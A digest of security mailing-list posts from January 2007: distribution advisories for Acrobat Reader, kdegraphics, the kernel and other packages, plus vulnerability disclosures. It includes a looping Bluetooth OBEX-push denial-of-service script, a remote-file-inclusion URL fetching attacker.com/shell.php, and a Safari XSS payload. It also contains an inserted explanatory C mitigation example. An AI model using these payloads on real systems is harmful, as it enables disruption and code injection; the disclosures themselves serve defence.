[ GLSA 200701-16 ] Adobe Acrobat Reader: Multiple vulnerabilities

2007-01-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

     Severity: Normal
        Title: Adobe Acrobat Reader: Multiple vulnerabilities
         Date: January 22, 2007
         Bugs: #159874
           ID: 200701-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========
Adobe Acrobat Reader is vulnerable to remote code execution, Denial of
Service, and cross-site scripting attacks.

Background
==========

Adobe Acrobat Reader is a PDF reader released by Adobe.

Affected packages
=================

    -------------------------------------------------------------------
     Package                      /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  app-text/acroread                  < 7.0.9                >= 7.0.9

Description
===========

Adobe Acrobat Reader in stand-alone mode is vulnerable to remote code
execution via heap corruption when loading a specially crafted PDF
file.

The browser plugin released with Adobe Acrobat Reader (nppdf.so) does
not properly handle URLs, and crashes if given a URL that is too long.
The plugin does not correctly handle JavaScript, and executes
JavaScript that is given as a GET variable to the URL of a PDF file.
Lastly, the plugin does not properly handle the FDF, xml, xfdf AJAX
request parameters following the # character in a URL, allowing for
multiple cross-site scripting vulnerabilities.

Impact
======

An attacker could entice a user to open a specially crafted PDF file
and execute arbitrary code with the rights of the user running Adobe
Acrobat Reader. An attacker could also entice a user to browse to a
specially crafted URL and either crash the Adobe Acrobat Reader browser
plugin, execute arbitrary JavaScript in the context of the user's
browser, or inject arbitrary HTML or JavaScript into the document being
viewed by the user. Note that users who have emerged Adobe Acrobat
Reader with the nsplugin USE flag disabled are not vulnerable to
issues with the Adobe Acrobat Reader browser plugin.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Adobe Acrobat Reader users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-7.0.9"

References
==========

  [ 1 ] CVE-2006-5857
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5857
  [ 2 ] CVE-2007-0044
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0044
  [ 3 ] CVE-2007-0045
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0045
  [ 4 ] CVE-2007-0046
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0046
  [ 5 ] CVE-2007-0048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0048

Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: Re: Re: SMF index.php?action=pm Cross Site-Scripting

2007-01-23 Thread Outlaw
This bug has been tested on the versions SMF 1.1.1
and 1.1 RC3. 

Aria-Security Team
http://aria-security.net


Re: Fantastic News =- (news.php) Remote File Include Vulnerability - bogus... again

2007-01-23 Thread Mailinglists Address


 Author: BorN To K!LL

Maybe this person should be called BorN To Gr3p or BorN To Post Fake
and Pointl3ss ExploiTz!
 ###

 Bug in :.  news.php

 code :
 require_once($CONFIG['script_path']."functions/functions.php");
 require_once($CONFIG['script_path']."functions/mysql.php");
 require_once($CONFIG['script_path']."functions/template.php");
Two lines above the previous code is the following two lines:

unset($CONFIG);
require_once("config.php");

Once again... security auditing via grep doesn't give you enough
information to post a complete and accurate bug/security report.
Honestly, do you have a bash one liner that you just feed scripts to,
that generates these bogus and pointless reports?

It is getting to the point where I almost don't bother to check the code
any more.

 GreeTz to :.

M4d pr0ps to vim, grep and sed.


rPSA-2007-0011-1 wget

2007-01-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0011-1
Published: 2007-01-23
Products: rPath Linux 1
Rating: Informational
Exposure Level Classification:
Indirect Deterministic Denial of Service
Updated Versions:
wget=/[EMAIL PROTECTED]:devel//1/1.10.2-4-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6719
https://issues.rpath.com/browse/RPL-930

Description:
Previous versions of the wget package can crash if they contact a
malicious FTP server.  No further vulnerability is enabled by this
minor flaw; system security is not threatened in any way.


[ MDKSA-2007:024 ] - Updated kdegraphics packages fix crafted pdf file vulnerability

2007-01-23 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:024
 http://www.mandriva.com/security/
 ___
 
 Package : kdegraphics
 Date: January 22, 2007
 Affected: 2007.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2,
 kpdf in KDE before 3.5.5, and other products, allows remote attackers
 to have an unknown impact, possibly including denial of service
 (infinite loop), arbitrary code execution, or memory corruption, via a
 PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages
 attribute that references an invalid page tree node.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 0cd41c0355a39824f669cac0c5013169  
2007.0/i586/kdegraphics-3.5.4-7.2mdv2007.0.i586.rpm
 6a9e0d68fe53b0886210de67360eed3f  
2007.0/i586/kdegraphics-common-3.5.4-7.2mdv2007.0.i586.rpm
 470dc3c84192a915d1a318168aa3cc64  
2007.0/i586/kdegraphics-kcolorchooser-3.5.4-7.2mdv2007.0.i586.rpm
 32e05dc7c4ae0a78ccf8fbb22712fce8  
2007.0/i586/kdegraphics-kcoloredit-3.5.4-7.2mdv2007.0.i586.rpm
 7379e6974d963f5f19e4485f98c4c75a  
2007.0/i586/kdegraphics-kdvi-3.5.4-7.2mdv2007.0.i586.rpm
 31025f05167cf00dc9f9aa8cdd9ae9ea  
2007.0/i586/kdegraphics-kfax-3.5.4-7.2mdv2007.0.i586.rpm
 1194b194a06049d9b6c40b7df89d25c0  
2007.0/i586/kdegraphics-kghostview-3.5.4-7.2mdv2007.0.i586.rpm
 8768ca0900e75182cd6ebb603ac81d0d  
2007.0/i586/kdegraphics-kiconedit-3.5.4-7.2mdv2007.0.i586.rpm
 86bf695e519c6fd20ca7a454bbe3f6f8  
2007.0/i586/kdegraphics-kolourpaint-3.5.4-7.2mdv2007.0.i586.rpm
 2f7eecf73812c0196f7d3c70e5fc8a38  
2007.0/i586/kdegraphics-kooka-3.5.4-7.2mdv2007.0.i586.rpm
 985c0a645812377949177d6e07283556  
2007.0/i586/kdegraphics-kpdf-3.5.4-7.2mdv2007.0.i586.rpm
 247591ab0e437c25d46d755a622c4a6a  
2007.0/i586/kdegraphics-kpovmodeler-3.5.4-7.2mdv2007.0.i586.rpm
 e6857a3e30e06fce42f8a63331d0d04c  
2007.0/i586/kdegraphics-kruler-3.5.4-7.2mdv2007.0.i586.rpm
 dbc566e75a97fa4d54fb4c96d2171868  
2007.0/i586/kdegraphics-ksnapshot-3.5.4-7.2mdv2007.0.i586.rpm
 0ae8ec2f105b1797eed7f14fe1f972a1  
2007.0/i586/kdegraphics-ksvg-3.5.4-7.2mdv2007.0.i586.rpm
 0a1be40a56fb46bed7320cca4f6795cc  
2007.0/i586/kdegraphics-kuickshow-3.5.4-7.2mdv2007.0.i586.rpm
 f1862b323da63bdf4a5ee82649f64f6d  
2007.0/i586/kdegraphics-kview-3.5.4-7.2mdv2007.0.i586.rpm
 08474806d83e756759f7f9a50a57eb63  
2007.0/i586/kdegraphics-mrmlsearch-3.5.4-7.2mdv2007.0.i586.rpm
 92aafc29e6a8663ada111b622f4966f4  
2007.0/i586/libkdegraphics0-common-3.5.4-7.2mdv2007.0.i586.rpm
 18e12acc104fef371ee43754a1ef9f82  
2007.0/i586/libkdegraphics0-common-devel-3.5.4-7.2mdv2007.0.i586.rpm
 4d9ba15dc6ca92ae0d33cf382c60447b  
2007.0/i586/libkdegraphics0-kghostview-3.5.4-7.2mdv2007.0.i586.rpm
 533fe072755ab1cad0a841f7f5923882  
2007.0/i586/libkdegraphics0-kghostview-devel-3.5.4-7.2mdv2007.0.i586.rpm
 954bd2bb51edbdb9b9139a8e30b0f7b5  
2007.0/i586/libkdegraphics0-kooka-3.5.4-7.2mdv2007.0.i586.rpm
 3c0e6cc9b6f7d19fd261faacca8a0d80  
2007.0/i586/libkdegraphics0-kooka-devel-3.5.4-7.2mdv2007.0.i586.rpm
 c4183748519d66a0fce222e667b40a07  
2007.0/i586/libkdegraphics0-kpovmodeler-3.5.4-7.2mdv2007.0.i586.rpm
 8b00015eb9b5fd80942ce7bd90dabb81  
2007.0/i586/libkdegraphics0-kpovmodeler-devel-3.5.4-7.2mdv2007.0.i586.rpm
 52472c010fff010454288391902a6e6d  
2007.0/i586/libkdegraphics0-ksvg-3.5.4-7.2mdv2007.0.i586.rpm
 61c8ca7bf0e5ae26d5d93b0f3b472a34  
2007.0/i586/libkdegraphics0-ksvg-devel-3.5.4-7.2mdv2007.0.i586.rpm
 ef27b1287e78a14f9ccc3a76b9255052  
2007.0/i586/libkdegraphics0-kview-3.5.4-7.2mdv2007.0.i586.rpm
 5bd75a572c9e1762af0def657b497f41  
2007.0/i586/libkdegraphics0-kview-devel-3.5.4-7.2mdv2007.0.i586.rpm 
 6f2928e61268d085e710f68ef577ed36  
2007.0/SRPMS/kdegraphics-3.5.4-7.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 0ce936615224ead11ac475808691a56f  
2007.0/x86_64/kdegraphics-3.5.4-7.2mdv2007.0.x86_64.rpm
 3320412a840fab74c6c2bd9f6efd909a  
2007.0/x86_64/kdegraphics-common-3.5.4-7.2mdv2007.0.x86_64.rpm
 15b9efa532fc48c71d21fc721ee43158  
2007.0/x86_64/kdegraphics-kcolorchooser-3.5.4-7.2mdv2007.0.x86_64.rpm
 7dadfafb418caca77be62eee0487d12b  
2007.0/x86_64/kdegraphics-kcoloredit-3.5.4-7.2mdv2007.0.x86_64.rpm
 4654670d37cb55420f6e3368b504726c  
2007.0/x86_64/kdegraphics-kdvi-3.5.4-7.2mdv2007.0.x86_64.rpm
 3a50b066541f2359a0b09a0fd0bb4475  
2007.0/x86_64/kdegraphics-kfax-3.5.4-7.2mdv2007.0.x86_64.rpm
 6c14c3639571fc0fd8cf022efdeca5ea  

Bluetooth DoS by obex push

2007-01-23 Thread hornung
Hello,

during a course project studying security and privacy related to Bluetooth, we 
discovered a simple but effective DoS attack using OBEX push.

Using ussp-push [1], it is possible to send out files very quickly. By 
continuously trying to push a file, the target is flooded with 
prompts whether to accept the file or not, which disables any other usage 
on the phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones:

- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800

and expect nearly all available phones with Bluetooth to be vulnerable (in 
contrary to the previous DoS by l2ping).

A proof-of-concept code is attached, using ussp-push and targeting a known MAC. 
This could be easily extended to target all visible devices. Plus, a user could 
be forced to accept a possibly malicious file with this attack. Using only one 
Bluetooth-Dongle, we were able to practically disable three phones 
simultaneously.

Best regards,
Stefan Ekerfelt and Armin Hornung

[1] http://www.xmailserver.org/ussp-push.html


Bluetooth DoS by obex push

2007-01-23 Thread Armin Hornung
Hello,

during a course project studying security and privacy related to
Bluetooth, we discovered a simple but effective DoS attack using OBEX push.

Using ussp-push [1], it is possible to send out files very quickly. By
continuously trying to push a file, the target is flooded with prompts
whether to accept the file or not, which disables any other usage on the
phone, including the ability to turn off Bluetooth.
We confirmed the attack to work on the following phones:

- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800

and expect nearly all available phones with Bluetooth to be vulnerable
(in contrary to the previous DoS by l2ping).

A proof-of-concept code is attached (plain text), using ussp-push and
targeting a known MAC. This could be easily extended to target all
visible devices.
Plus, a user could be forced to accept a possibly malicious file with
this attack. Using only one Bluetooth-Dongle, we were able to
practically disable three phones simultaneously.

Best regards,
Stefan Ekerfelt and Armin Hornung

[1] http://www.xmailserver.org/ussp-push.html




#!/bin/bash

# Look up the OBEX Object Push service record of the given device via SDP
# and return its RFCOMM channel as the exit status (0 = no OPUSH record).
checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr "$MAC" OPUSH | grep Channel:)
if test "$OCHAN" != ""
then
OCHAN=$(echo "$OCHAN" | awk '/Channel:/ { print $2 }')
return "$OCHAN"
fi
return 0
}


if test $# -ne 2
then
 echo "Usage: $0 <bdaddr> <filename>"
 exit 127
fi

MAC=$1
FILENAME=$2

checkOPUSH "$MAC"
OCHAN=$?

if test "$OCHAN" -eq 0
then
 echo "Couldn't connect to $MAC via OBEX push."
 exit 127
fi


while true
do
./ussp-push [EMAIL PROTECTED] $FILENAME $FILENAME
done


xss filter to protect from xss attacks

2007-01-23 Thread Anurag Agarwal
I have created a xss filter to protect from xss attacks. Though i have 
filtered only for 8 characters but i was able to test against all the 
attacks mentioned in the RSnake's cheat sheet. Appscan was not able to 
detect any xss attacks on it. I request the application security community 
to help test this filter. 90% i am sure that you wont be able to perform any 
xss attack on it, the rest 10% i will find out after the feedback from the 
community. For the curious mind, it is written in java


In case if you are successful in performing xss attack, please do reply to 
this email with your name, browser and the xss attack string.


url - http://www.attacklabs.com/xssfilter/

I appreciate your time and effort. Thanks a lot in advance

regards
Anurag 



Safari Improperly Parses HTML Documents BlogSpot XSS vulnerability

2007-01-23 Thread Jose Avila III

Overview:

Safari on occasions may improperly parse the source of an HTML  
document, which can lead to the execution of html tags within  
comments. This can become dangerous when input filters allow html  
tags within comments, as they will get parsed and executed under  
certain circumstances.


Details:

In some cases you can cause Apple’s Safari browser to execute code  
when it should not be executed. In the following example everything  
within the comment, in theory should never be executed; however,  
safari decides to execute the script tag.


<title>myblog<!--</title></head><body><script src="http://beanfuzz.com/bean.js"></script> --></title>


Blogs hosted on BlogSpot.com have filter mechanisms for their input;  
however, they will allow you to inject anything within comments. This  
made it possible to cross site script blogspot.com. Note: Only Safari  
viewers will be affected.


Proof of concept: http://dirtybean1234.blogspot.com/

Initial release of vulnerability: http://www.beanfuzz.com/wordpress/? 
p=99


Vendor Response:

I was unable to get a response from the vendor in regards to this issue

Questions / Comments:
Jose (at) onzra (dot) com


Register for my RSA 2007 Training Course
Creative Web Protocol Attacks, Beyond Web Hacking
February 4, 5 2007 San Francisco
https://cm.rsaconference.com/US07/catalog/eventguide/publicSchedule.jsp






Re: Multiple OS kernel insecure handling of stdio file descriptor

2007-01-23 Thread eugeny gladkih
>>>>> "SP" == Shiva Persaud [EMAIL PROTECTED] writes:

 >> XFOCUS team (http://www.xfocus.org/)  had discovered Multiple OS kernel
 >> insecure handling of stdio file descriptor.
 >> 
 >> ===
 >> Affected OS Version
 >> 
 >> AIX 5.3

 SP> The AIX Security Team can be reached at [EMAIL PROTECTED]

 SP> We have investigated this issue and AIX is not affected. A privileged
 SP> process will not inherit closed file descriptors for stdin, stdout and
 SP> stderr.

well, but what is used for stdout if it's closed in the parent
process just before fork(2) call?!

-- 
Yours sincerely, Eugeny.
Doctor Web, Ltd. http://www.drweb.com
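The question raised above is the one a defender has to answer in code: a program that may be started with descriptor 0, 1 or 2 already closed should repair that before it does anything else, because the next open() it performs will otherwise land on a standard descriptor, and later diagnostics written to "stderr" go into that file. The following C example is added here and is not code from this thread, from XFOCUS or from IBM; it assumes a POSIX system with /dev/null and shows the conventional mitigation (point any closed standard descriptor at /dev/null at start-up), together with a self-check that closes stderr, runs the repair and restores the original stderr.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Return 1 if fd refers to an open file description, 0 if it is closed. */
int fd_is_open(int fd)
{
    return fcntl(fd, F_GETFD) != -1 || errno != EBADF;
}

/*
 * Make sure descriptors 0, 1 and 2 are open before anything trusts them.
 * Any closed one is pointed at /dev/null, so a later open() inside a
 * privileged program cannot receive a standard descriptor number and have
 * diagnostics written into the file it just opened.
 * Returns the number of descriptors reopened, or -1 if /dev/null could
 * not be opened.
 */
int ensure_std_fds(void)
{
    int reopened = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fd_is_open(fd))
            continue;
        /* open() returns the lowest free descriptor, which is fd itself
         * because every lower standard descriptor was handled already. */
        int nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nfd == -1)
            return -1;
        if (nfd != fd) {               /* defensive: should not happen */
            if (dup2(nfd, fd) == -1) {
                close(nfd);
                return -1;
            }
            close(nfd);
        }
        reopened++;
    }
    return reopened;
}

/*
 * Self-check reproducing the condition discussed in the thread: stderr is
 * closed before the (privileged) code runs. Returns 1 when the repair
 * reopened exactly fd 2 and fd 2 is usable again afterwards, 0 otherwise.
 * The process's real stderr is saved and restored around the test.
 */
int demo_closed_stderr_recovery(void)
{
    if (ensure_std_fds() < 0)          /* start from a well-defined state */
        return 0;
    int saved = dup(STDERR_FILENO);    /* keep the real stderr */
    if (saved == -1)
        return 0;
    close(STDERR_FILENO);
    int before   = fd_is_open(STDERR_FILENO);   /* expect 0 */
    int repaired = ensure_std_fds();            /* expect 1 */
    int after    = fd_is_open(STDERR_FILENO);   /* expect 1 */
    dup2(saved, STDERR_FILENO);                 /* restore real stderr */
    close(saved);
    return before == 0 && repaired == 1 && after == 1;
}

int main(void)
{
    int ok = demo_closed_stderr_recovery();
    printf("%s\n", ok ? "closed stderr repaired" : "FAILED");
    return ok ? 0 : 1;
}
```

Call ensure_std_fds() as the first statement of main() in any set-user-ID or otherwise privileged program, before it opens files or initialises logging; the same check belongs in any parent that forks such a program, since a closed standard descriptor is inherited across fork(2) and execve(2) regardless of what the kernel does afterwards.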


rPSA-2007-0012-1 ed

2007-01-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0012-1
Published: 2007-01-23
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Local User Non-deterministic Vulnerability
Updated Versions:
ed=/[EMAIL PROTECTED]:devel//1/0.4-1-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6939
https://issues.rpath.com/browse/RPL-962

Description:
Previous versions of the ed package are vulnerable to a symlink
attack which allows a local attacker to overwrite arbitrary files
writeable by the user running ed with contents provided by the
user running the ed program.


Adobe ColdFusion Information Disclosure

2007-01-23 Thread zck zck

Hi people,

I was wondering whether I was right or not about this vuln:
http://www.securityfocus.com/bid/21978

Unfortunately, I don't have a Colfusion to test on.. What I would do is:
http://colfusion-server/an-existing-file.cfm%2500.cfm

and I expect the server to spit out the source code

Am I right here? Did anybody try this out? If so, how did you do it?
Thank you.

Cheers,
Mateo


AToZed Software Intraweb Component for Borland Delphi and Kylix DoS vulnerability

2007-01-23 Thread C0r3 1mp4ct

Type: Denial of Service
Severity: Critical
Title: AToZed Software IntraWeb Component for Borland Delphi and Kylix
DoS vulnerability
Date: January 23, 2007

Synopsis
--------

A DoS vulnerability exists in the IntraWeb Component of AToZed Software.

Background
----------

IntraWeb is a RAD component for Borland Delphi and Kylix by AToZed Software,
which allows developers to rapidly develop web applications.
This component is commonly used by Borland developers internationally.

Description
-----------

A DoS condition occurs when a specially crafted HTTP request is sent
to the web application.
After the request, the affected thread enters an infinite loop and hangs.
Under IIS 5.x, the thread will never be stopped.
Under IIS 6 the web server automatically stops the thread after the
configured amount of time or CPU usage.

Impact
------

An attack can cause the web application to slow down and, after more
specially crafted requests, to stop processing requests.

Workaround
----------

There is no vendor supplied workaround for the problem at this time.

A possible workaround is to filter the request body for the special
request and repair it.
This can be achieved by overriding the OnBeforeDispatch handler of the
TIWServerController object and repairing the request by changing the
Request.Content field.

Affected versions
-----------------

IntraWeb 8.0 and lower versions

Vulnerability timeline
----------------------

2006.08.   - Vendor notified, but no answer
2007.01.23 - Vulnerability publicly available

Discovery is credited to: C0r31mp4ct


Re: Digital Armaments Security Advisory 20.01.2007: Grsecurity Kernel PaX Vulnerability

2007-01-23 Thread nospam
Could you please provide more details about this vulnerability ? Especially 
which versions are affected :-)

Kind regards,

Marek Kroemeke 


Re: phpAdsNew 2.0.7 Remote File Include

2007-01-23 Thread l . d . 0
what ?

no bug there ?

can u give us proof ! examples !!

thanks

by [EMAIL PROTECTED]
l.d.0


rPSA-2007-0015-1 libsoup

2007-01-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0015-1
Published: 2007-01-23
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect Denial of Service
Updated Versions:
libsoup=/[EMAIL PROTECTED]:devel//1/2.2.99-1-0.1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5876
https://issues.rpath.com/browse/RPL-965

Description:
Previous versions of the libsoup package are vulnerable to an indirect
denial of service in which a malicious or faulty server responds to
requests with malformed HTTP headers, causing the application that
uses libsoup to crash.


Re: Windows logoff bug possible security vulnerability and exploit.

2007-01-23 Thread Bart ....

Dear Rage Coder,

I think this is a known problem, see Microsoft knowledge base article 837115:
http://support.microsoft.com/kb/837115

Microsoft recommend to use User Profile Hive Cleanup Service:
http://www.microsoft.com/downloads/details.aspx?FamilyID=1B286E6D-8912-4E18-B570-42470E2F3582&displaylang=en

Can you tell me if this helps solving your problem?

Greetz
Bart

Rage Coder wrote:
The problem only occurs at times.  To reproduce the problem, I just use the 
computer normally, and at each logon check the event viewer and running 
processes to see if a profile unload failed.  I don't have any special 
terminal software or other logon software installed.


I find that if I wait for a little bit after logging off before logging on 
again, no running programs from the previous logon are present, but if I 
log on just after logging off, they will be if the profile unload fails.  
That still shouldn't be the case.  My brother frequently goes on his 
account right after I go off; there shouldn't be a time limit to wait in 
order to prevent this.


I noticed an interesting thing about XP and fast user switching which would 
likely stop this problem.  When logging on, the first logged on user is 
given session ID 0, as shown in task manager, but if I 'switch' to another 
user, the user is given a different session ID.  It seems that no two users 
are given the same session ID when using fast user switching. But when 
logging off all users and then back on, it is back to session 0.  And if I 
just log on as a user, log off, and then on as another user without using 
the 'switch user', they both are session ID 0.


The same thing happens when using classic logon and on 2003.  All logons 
are given session ID 0.  I did some reading in the platform SDK and some 
sites about stuff, and it seems that these sessions literally create an 
isolation.  Messages sent from a process in one session ID are not visible 
to processes in another, windows created only appear on the desktop 
associated with that session of the process that created the window, etc.


Ideally, running classic logon always as session 0 'should' work because 
ideally when logging off, the processes run 'should' close, so the next user 
to log on would have nothing to access.  But this does not appear to be the 
case at all times.


A few moments ago I logged in as administrator to do some minor changes, 
and I ran EPIM to take some notes of things.  When I logged off and back on 
as a regular user, 'explorer.exe', 'essentialpim.exe', 'seamonkey.exe' 
were still running as Administrator, event viewer showed the usual UserEnv 
messages, and EPIM appeared on the system tray.  My guess is something like 
this happens:


Logon Administrator : Session ID 0
Run EssentialPIM : Session ID 0
Do some stuff
Logoff Administrator : Profile unload fails, a few programs continue 
running

Logon Normal User : Session ID 0
Explorer runs, and at startup broadcasts 'TaskbarCreated' message
All processes in session 0 get this message, EPIM adds system tray icon 
like it is supposed to


If each logon, even in classic mode, is given a separate session ID as is 
done in fast user switching, this would not happen, even if the profile 
unload fails and the programs continue to run waiting for the profile to 
unload:


Logon Administrator : Session ID 0
Run EssentialPIM : Session ID 0
Do some stuff
Logoff Administrator : Profile unload fails, a few programs continue 
running

Logon Normal User : Session ID 1
Explorer runs, and at startup broadcasts 'TaskbarCreated' message
All processes in session 1 get this message
Programs that may continue to run in session 0 are isolated

If I log on as administrator again, it would be ok to reuse session 0, but 
for a given boot, no two users should be assigned the same logon session 
ID.  I.E.  if I log on as Normal User again, it would be session 1,  etc.


This would not prevent a profile from failing to unload, and would not 
prevent the processes from continuing to run, but it will prevent a user 
from a later logon from accessing the processes in the current logon.


[EMAIL PROTECTED] wrote:

Dear Rage Coder,

 I've seen unloaded profiles for many times, but I never saw application
 still  running  after  logoff.  Profile  itself doesn't create security
 vulnerability, since it can not be accessed by another user.

 What do you use to reproduce this vulnerability?

 Are  you  sure  you  do  not  use some different software which affects
 logon/logoff process, e.g. 3rd party terminal software or some security
 enhancement?






[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion

2007-01-23 Thread y3dips
--
[ECHO_ADV_62$2007] Upload Service 1.0 remote file inclusion
--

Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : January, 21st 2007
Location : Indonesia, Jakarta
web : http://echo.or.id/adv/adv62-y3dips-2007.txt
Critical Lvl : Critical
--


Affected software description:
~~~

Application : Upload Service
version : 1.0
URL : http://bild-bearbeiten.de/
Download-path : http://bild-bearbeiten.de/scripts/upload_service_1.0.zip

---

1. The install directory is not removed after the installation process.
2. The variable $maindir in top.php is not properly sanitized.

---top.php
...
include($maindir."config.php");
include($maindir."functions/error.php");
...
--

When register_globals=on and allow_fopenurl=on an attacker can exploit
this vulnerability with a simple php injection script.

Poc/Exploit:
~

http://target.com/upload/top.php?maindir=http://attacker.com/shell.php?

Solution:
~~
- Remember to remove your install directory and change config.php permissions
- Simply sanitize the variable $maindir in the affected files (eg. $maindir = "";)
- Turn off register_globals

Notification:
~

vendor not contact yet

---
Shoutz:

~ my lovely ana
~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff
~ [EMAIL PROTECTED]
~ #e-c-h-o @irc.dal.net
--
Contact:
~

y3dips|| echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/

 [ EOF ] -


rPSA-2007-0014-1 libgtop

2007-01-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0014-1
Published: 2007-01-23
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Denial of Service
Updated Versions:
libgtop=/[EMAIL PROTECTED]:devel//1/2.12.0-1.2-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0235
https://issues.rpath.com/browse/RPL-972

Description:
Previous versions of the libgtop package are vulnerable to an attack
in which a local user can at least cause programs that use libgtop
(such as gnome-system-monitor) to crash, and possibly to execute
arbitrary code as the user running the program.


[ MDKSA-2007:025 ] - Updated kernel packages fix multiple vulnerabilities and bugs

2007-01-23 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:025
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: January 23, 2007
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Some vulnerabilities were discovered and corrected in the Linux 2.6
 kernel:

 The 2.6 kernel prior to 2.6.12 allows remote attackers to poison the
 bridge forwarding table using frames that have already been dropped by
 filtering, which can cause the bridge to forward spoofed packets
 (CVE-2005-3272).

 Prior to 2.6.15.5, the kernel allows local users to cause a DoS
 (endless recursive fault) via unknown attack vectors related to a
 bad elf entry address on Intel processors (CVE-2006-0741).

 A race condition in the socket buffer handling in the 2.6.9 kernel and
 earlier versions could allow a remote attacker to cause a DoS (crash)
 (CVE-2006-2446).

 Stephane Eranian discovered an issue with perfmon2.0 where, under
 certain circumstances, the perfmonctl() system call may not correctly
 manage the file descriptor reference count, resulting in the system
 possibly running out of file structure (CVE-2006-3741).

 Prior to and including 2.6.17, the Universal Disk Format (UDF)
 filesystem driver allowed local users to cause a DoS (hang and crash)
 via certain operations involving truncated files (CVE-2006-4145).

 Various versions of the Linux kernel allowed local users to cause a DoS
 (crash) via an SCTP socket with a certain SO_LINGER value, which is
 possibly related to the patch used to correct CVE-2006-3745
 (CVE-2006-4535).

 The __block_prepare_write function in the 2.6 kernel before 2.6.13 does
 not properly clear buffers during certain error conditions, which
 allows users to read portions of files that have been unlinked
 (CVE-2006-4813).

 The clip_mkip function of the ATM subsystem in the 2.6 kernel allows
 remote attackers to cause a DoS (panic) via unknown vectors that cause
 the ATM subsystem to access the memory of socket buffers after they are
 freed (CVE-2006-4997).

 The seqfile handling in the 2.6 kernel up to 2.6.18 allows local users
 to cause a DoS (hang or oops) via unspecified manipulations that
 trigger an infinite loop while searching for flowlabels
 (CVE-2006-5619).

 A missing call to init_timer() in the isdn_ppp code of the Linux kernel
 can allow remote attackers to send a special kind of PPP packet which
 may trigger a kernel oops (CVE-2006-5749).

 The aio_setup_ring() function initializes a variable incorrectly which
 can be used in error path to free allocated resources which could allow
 a local user to crash the node (CVE-2006-5754).

 A vulnerability in the bluetooth support could allow for overwriting
 internal CMTP and CAPI data structures via malformed packets
 (CVE-2006-6106).

 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.

 To update your kernel, please follow the directions located at:

 http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3272
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0741
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2446
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3741
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4145
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4535
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4813
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4997
